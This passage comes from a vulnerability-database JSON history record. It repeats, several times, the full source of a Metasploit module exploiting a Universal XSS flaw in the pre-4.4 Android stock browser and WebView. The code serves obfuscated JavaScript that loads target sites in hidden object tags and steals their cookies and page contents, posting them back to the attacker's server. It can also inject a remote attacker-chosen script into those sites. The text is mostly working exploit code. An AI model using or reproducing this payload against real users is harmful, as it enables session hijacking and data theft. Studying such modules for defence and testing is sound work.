Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-05-10T17:05:42", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-05-10T19:04:33", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-05-10T19:04:33", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-01T19:44:00", "history": [], "viewCount": 56, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-06-01T19:44:00", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-06-01T21:52:28", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-06-01T21:52:28", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-01T02:57:52", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-01T02:57:52", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-01T04:59:41", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-01T04:59:41", "differentElements": 